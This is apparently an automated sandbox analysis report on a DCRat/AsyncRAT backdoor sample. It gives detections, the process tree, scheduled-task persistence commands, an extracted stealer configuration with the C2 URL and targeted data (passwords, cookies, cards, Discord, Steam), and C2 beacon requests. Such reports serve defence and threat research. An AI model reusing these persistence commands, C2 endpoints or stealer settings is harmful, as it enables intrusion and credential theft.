Windows Analysis Report
HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe

Overview

General Information

Sample Name: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe
Analysis ID: 1337252
MD5: 5d329190630c5c051e1b2c4ad4c69abd
SHA1: 0227d4e1597ca90477cad5fc3a960f3590457031
SHA256: 6974f159cb6e056fd9675ec4ecb6d271a7d6bb69711a295be593091d3bcb9e45
Tags: DCRat, exe

Detection

DCRat
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Yara detected DCRat
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for dropped file
Creates multiple autostart registry keys
Creates processes via WMI
Machine Learning detection for sample
.NET source code contains potential unpacker
Uses schtasks.exe or at.exe to add and modify task schedules
Drops executable to a common third party application directory
Yara detected Generic Downloader
.NET source code contains method to dynamically call methods (often used by packers)
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
PE file contains sections with non-standard names
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to communicate with device drivers
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

  • System is w10x64
  • HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe (PID: 6476 cmdline: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe MD5: 5D329190630C5C051E1B2C4AD4C69ABD)
    • wscript.exe (PID: 6596 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Adobe\sN8j8UtUmLUEbzv.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 6876 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Adobe\87tDm8T1lOvAjdSEmWMIMA3JTpcTMB.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • hui.exe (PID: 7000 cmdline: C:\Users\user\AppData\Roaming\Adobe\hui.exe MD5: 1B46DAD7064609344351AC9EFE3F9AAB)
          • cmd.exe (PID: 5672 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zoUR8TSZV2.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 6472 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • w32tm.exe (PID: 7056 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
            • hui.exe (PID: 5664 cmdline: "C:\Users\user\AppData\Roaming\Adobe\hui.exe" MD5: 1B46DAD7064609344351AC9EFE3F9AAB)
  • schtasks.exe (PID: 2228 cmdline: schtasks.exe /create /tn "KQihinlofznONtA" /sc ONLOGON /tr "'C:\PerfLogs\KQihinlofznONtA.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • schtasks.exe (PID: 4928 cmdline: schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\PerfLogs\WmiPrvSE.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • schtasks.exe (PID: 7032 cmdline: schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • KQihinlofznONtA.exe (PID: 5084 cmdline: C:\PerfLogs\KQihinlofznONtA.exe MD5: 1B46DAD7064609344351AC9EFE3F9AAB)
  • WmiPrvSE.exe (PID: 4136 cmdline: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe MD5: 1B46DAD7064609344351AC9EFE3F9AAB)
  • WmiPrvSE.exe (PID: 6476 cmdline: "C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe" MD5: 1B46DAD7064609344351AC9EFE3F9AAB)
  • cleanup
{"H1": "http://host1835875.hostland.pro/@0NXZ0xGbvB3Zu9Gb39GT", "H2": "http://host1835875.hostland.pro/@0NXZ0xGbvB3Zu9Gb39GT", "TAG": "", "MUTEX": "DCR_MUTEX-jzFMg9WBCIr3URsB3Ftf", "LDTM": false, "DBG": false, "BCS": 0, "AUR": 2, "ASCFG": {"ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": false, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true}, "AS": true, "ASO": false, "ASP": "%SystemDrive% - Slow", "AK": false, "AD": false}
Source | Rule | Description | Author | Strings
C:\PerfLogs\KQihinlofznONtA.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
C:\Users\user\AppData\Roaming\Adobe\hui.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
C:\PerfLogs\WmiPrvSE.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
C:\PerfLogs\WmiPrvSE.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |

Source | Rule | Description | Author | Strings
00000008.00000002.1816721235.0000000002AFB000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000009.00000002.1760913066.000000000299D000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000009.00000002.1760913066.0000000002931000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000009.00000002.1760913066.0000000002931000.00000004.00000800.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • 0x1d48c:$s8: Win32_ComputerSystem
  • 0x1d59c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x1d63a:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x1d750:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x17b28:$cnc4: POST / HTTP/1.1
00000008.00000002.1816721235.0000000002A91000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

Source | Rule | Description | Author | Strings
0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.4ad411f.1.raw.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
4.0.hui.exe.1b0000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |

No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: C:\Users\user\AppData\Roaming\Adobe\hui.exe | Avira: detection malicious, Label: HEUR/AGEN.1323343
Source: C:\Users\user\AppData\Roaming\Adobe\sN8j8UtUmLUEbzv.vbe | Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\PerfLogs\WmiPrvSE.exe | Avira: detection malicious, Label: HEUR/AGEN.1323343
Source: C:\Users\user\AppData\Local\Temp\zoUR8TSZV2.bat | Avira: detection malicious, Label: BAT/Runner.rghmi
Source: C:\PerfLogs\KQihinlofznONtA.exe | Avira: detection malicious, Label: HEUR/AGEN.1323343
Source: C:\PerfLogs\WmiPrvSE.exe | Avira: detection malicious, Label: HEUR/AGEN.1323343
Source: 00000009.00000002.1760913066.000000000299D000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: DCRat {"H1": "http://host1835875.hostland.pro/@0NXZ0xGbvB3Zu9Gb39GT", "H2": "http://host1835875.hostland.pro/@0NXZ0xGbvB3Zu9Gb39GT", "TAG": "", "MUTEX": "DCR_MUTEX-jzFMg9WBCIr3URsB3Ftf", "LDTM": false, "DBG": false, "BCS": 0, "AUR": 2, "ASCFG": {"ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": false, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true}, "AS": true, "ASO": false, "ASP": "%SystemDrive% - Slow", "AK": false, "AD": false}
Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | ReversingLabs: Detection: 68%
Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Virustotal: Detection: 65%
Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Avira: detected
Source: C:\PerfLogs\KQihinlofznONtA.exe | ReversingLabs: Detection: 87%
Source: C:\PerfLogs\KQihinlofznONtA.exe | Virustotal: Detection: 60%
Source: C:\PerfLogs\WmiPrvSE.exe | ReversingLabs: Detection: 87%
Source: C:\PerfLogs\WmiPrvSE.exe | Virustotal: Detection: 60%
Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe | ReversingLabs: Detection: 87%
Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe | Virustotal: Detection: 60%
Source: C:\Users\user\AppData\Roaming\Adobe\hui.exe | ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Roaming\Adobe\hui.exe | Virustotal: Detection: 60%
Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Adobe\hui.exe | Joe Sandbox ML: detected
Source: C:\PerfLogs\WmiPrvSE.exe | Joe Sandbox ML: detected
Source: C:\PerfLogs\KQihinlofznONtA.exe | Joe Sandbox ML: detected
Source: C:\PerfLogs\WmiPrvSE.exe | Joe Sandbox ML: detected
Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\AppData\Roaming\Adobe\hui.exe | Directory created: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe
Source: C:\Users\user\AppData\Roaming\Adobe\hui.exe | Directory created: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\24dbde2999530ef5fd907494bc374d663924116c
Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb | source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe
Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Code function: 0_2_007DA5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 0_2_007DA5F4
Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Code function: 0_2_007EB8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 0_2_007EB8E0
Source: C:\Users\user\AppData\Roaming\Adobe\hui.exe | Code function: 4x nop then jmp 00007FFD9BAE26F3h 4_2_00007FFD9BAE1EF4
Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe | Code function: 4x nop then jmp 00007FFD9BAB26F3h 9_2_00007FFD9BAB1EF4
Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe | Code function: 4x nop then jmp 00007FFD9BAB26F3h 18_2_00007FFD9BAB1EF4

Networking

Source: Yara match | File source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.4ad411f.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.hui.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: C:\PerfLogs\KQihinlofznONtA.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\Adobe\hui.exe, type: DROPPED
Source: Yara match | File source: C:\PerfLogs\WmiPrvSE.exe, type: DROPPED
Source: Yara match | File source: C:\PerfLogs\WmiPrvSE.exe, type: DROPPED
Source: Malware configuration extractor | URLs: http://host1835875.hostland.pro/@0NXZ0xGbvB3Zu9Gb39GT
Source: global traffic | HTTP traffic detected: GET /Lowlongpolltest.php?fpx0A0VKNNT3jT2dNBkuvNR98C5s=1yQEvZAPO2s&3998e4b767cc58057b788963dc557b0a=79a349ba785d906a76eb09f6c1191279&a186b4e8b8ab60f6ea84885b889965cc=QMzcTNzIWZ1UjM5Y2MhlzMmNTNxQ2YkF2M4cTZwgTMwMjNjFzNxkzM&fpx0A0VKNNT3jT2dNBkuvNR98C5s=1yQEvZAPO2s HTTP/1.1
  Accept: */*
  Content-Type: text/html
  User-Agent: Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.98 Mobile Safari/537.3
  Host: host1835875.hostland.pro
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /Lowlongpolltest.php?fpx0A0VKNNT3jT2dNBkuvNR98C5s=1yQEvZAPO2s&3998e4b767cc58057b788963dc557b0a=79a349ba785d906a76eb09f6c1191279&a186b4e8b8ab60f6ea84885b889965cc=QMzcTNzIWZ1UjM5Y2MhlzMmNTNxQ2YkF2M4cTZwgTMwMjNjFzNxkzM&fpx0A0VKNNT3jT2dNBkuvNR98C5s=1yQEvZAPO2s HTTP/1.1
  Accept: */*
  Content-Type: text/html
  User-Agent: Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.98 Mobile Safari/537.3
  Host: host1835875.hostland.pro
Source: global traffic | HTTP traffic detected: GET /Lowlongpolltest.php?vsUBxK4ppQZ8aDT8iyUE4KfcwtSFC=9aubHCzwLXJHHcAcgf54Zhii&lN2OD2zm5Q9N95QIwn65xDDbUNxJIVc=Lcgz7hIfUeMLBOgjpwm4mnLiJb4z&3998e4b767cc58057b788963dc557b0a=79a349ba785d906a76eb09f6c1191279&a186b4e8b8ab60f6ea84885b889965cc=QMzcTNzIWZ1UjM5Y2MhlzMmNTNxQ2YkF2M4cTZwgTMwMjNjFzNxkzM&vsUBxK4ppQZ8aDT8iyUE4KfcwtSFC=9aubHCzwLXJHHcAcgf54Zhii&lN2OD2zm5Q9N95QIwn65xDDbUNxJIVc=Lcgz7hIfUeMLBOgjpwm4mnLiJb4z HTTP/1.1
  Accept: */*
  Content-Type: text/javascript
  User-Agent: Mozilla/5.0 (PlayStation 4 3.11) AppleWebKit/537.73 (KHTML, like Gecko)
  Host: host1835875.hostland.pro
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /Lowlongpolltest.php?vsUBxK4ppQZ8aDT8iyUE4KfcwtSFC=9aubHCzwLXJHHcAcgf54Zhii&lN2OD2zm5Q9N95QIwn65xDDbUNxJIVc=Lcgz7hIfUeMLBOgjpwm4mnLiJb4z&3998e4b767cc58057b788963dc557b0a=79a349ba785d906a76eb09f6c1191279&a186b4e8b8ab60f6ea84885b889965cc=QMzcTNzIWZ1UjM5Y2MhlzMmNTNxQ2YkF2M4cTZwgTMwMjNjFzNxkzM&vsUBxK4ppQZ8aDT8iyUE4KfcwtSFC=9aubHCzwLXJHHcAcgf54Zhii&lN2OD2zm5Q9N95QIwn65xDDbUNxJIVc=Lcgz7hIfUeMLBOgjpwm4mnLiJb4z HTTP/1.1
  Accept: */*
  Content-Type: text/javascript
  User-Agent: Mozilla/5.0 (PlayStation 4 3.11) AppleWebKit/537.73 (KHTML, like Gecko)
  Host: host1835875.hostland.pro
Source: WmiPrvSE.exe, 00000012.00000002.2531367222.0000000002DCE000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000012.00000002.2531367222.0000000002DA7000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000012.00000002.2531367222.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://host1835875.hostland.pro
Source: WmiPrvSE.exe, 00000012.00000002.2531367222.0000000002CB5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://host1835875.hostland.pro/
Source: WmiPrvSE.exe, 00000009.00000002.1760913066.0000000002AC8000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000009.00000002.1760913066.0000000002A9F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://host1835875.hostland.pro/Lowlongpolltest.php?fpx0A0VKNNT3jT2dNBkuvNR98C5s=1yQEvZAPO2s&3998e4b
Source: WmiPrvSE.exe, 00000012.00000002.2531367222.0000000002DCE000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000012.00000002.2531367222.0000000002DA7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://host1835875.hostland.pro/Lowlongpolltest.php?vsUBxK4ppQZ8aDT8iyUE4KfcwtSFC=9aubHCzwLXJHHcAcgf
Source: hui.exe, 00000004.00000002.1741908323.0000000002619000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000009.00000002.1760913066.0000000002A9F000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000012.00000002.2531367222.0000000002DA7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe, hui.exe.0.dr, WmiPrvSE.exe.4.dr, KQihinlofznONtA.exe.4.dr, WmiPrvSE.exe0.4.dr | String found in binary or memory: https://research.activision.com/opensourceD
Source: WmiPrvSE.exe, 00000009.00000002.1760913066.0000000002931000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/
Source: unknown | DNS traffic detected: queries for: host1835875.hostland.pro
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
  Server: nginx
  Date: Sun, 05 Nov 2023 13:27:06 GMT
  Content-Type: text/html
  Content-Length: 548
  Connection: keep-alive
  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
  Server: nginx
  Date: Sun, 05 Nov 2023 13:28:23 GMT
  Content-Type: text/html
  Content-Length: 146
  Connection: keep-alive
  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1

System Summary

Source: 00000009.00000002.1760913066.0000000002931000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000008.00000002.1816721235.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000004.00000002.1741908323.0000000002521000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: Process Memory Space: hui.exe PID: 7000, type: MEMORYSTR | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: Process Memory Space: KQihinlofznONtA.exe PID: 5084, type: MEMORYSTR | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: Process Memory Space: WmiPrvSE.exe PID: 4136, type: MEMORYSTR | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Code function: 0_2_007D857B
Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Code function: 0_2_007D407E
Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Code function: 0_2_007FD00E
Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Code function: 0_2_007E70BF
Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Code function: 0_2_00801194
Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Code function: 0_2_007F02F6
Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Code function: 0_2_007DE2A0
Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Code function: 0_2_007D3281
Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Code function: 0_2_007E6646
Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Code function: 0_2_007F473A
Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Code function: 0_2_007F070E
Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Code function: 0_2_007D27E8
Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Code function: 0_2_007E37C1
Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Code function: 0_2_007DE8A0
Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Code function: 0_2_007DF968
Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Code function: 0_2_007F4969
Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Code function: 0_2_007E6A7B
Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Code function: 0_2_007E3A3C
Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Code function: 0_2_007FCB60
Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Code function: 0_2_007F0B43
Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Code function: 0_2_007E5C77
Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Code function: 0_2_007E3D6D
Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Code function: 0_2_007DED14
Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Code function: 0_2_007EFDFA
Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Code function: 0_2_007DDE6C
Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Code function: 0_2_007DBE13
Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Code function: 0_2_007F0F78
Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Code function: 0_2_007D5F3C
Source: C:\Users\user\AppData\Roaming\Adobe\hui.exe | Code function: 4_2_00007FFD9BAD6C21
Source: C:\PerfLogs\KQihinlofznONtA.exe | Code function: 8_2_00007FFD9BAC6C21
Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe | Code function: 9_2_00007FFD9BAA6C21
Source: C:\Users\user\AppData\Roaming\Adobe\hui.exe | Code function: 14_2_00007FFD9BA96C21
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeCode function: 18_2_00007FFD9BAA6C2118_2_00007FFD9BAA6C21
Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Section loaded: api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Section loaded: api-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Section loaded: api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Section loaded: api-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Section loaded: api-ms-win-core-localization-l1-2-1.dll
Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Section loaded: dxgidebug.dll
Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000009.00000002.1760913066.0000000002931000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000008.00000002.1816721235.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000004.00000002.1741908323.0000000002521000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Process Memory Space: hui.exe PID: 7000, type: MEMORYSTR | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Process Memory Space: KQihinlofznONtA.exe PID: 5084, type: MEMORYSTR | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Process Memory Space: WmiPrvSE.exe PID: 4136, type: MEMORYSTR | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Code function: String function: 007EE28C appears 35 times
Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Code function: String function: 007EE360 appears 52 times
Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Code function: String function: 007EED00 appears 31 times
Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | Code function: 0_2_007D718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW
Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe, 00000000.00000003.1629131085.0000000004A65000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename telescop.dll$ vs HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe
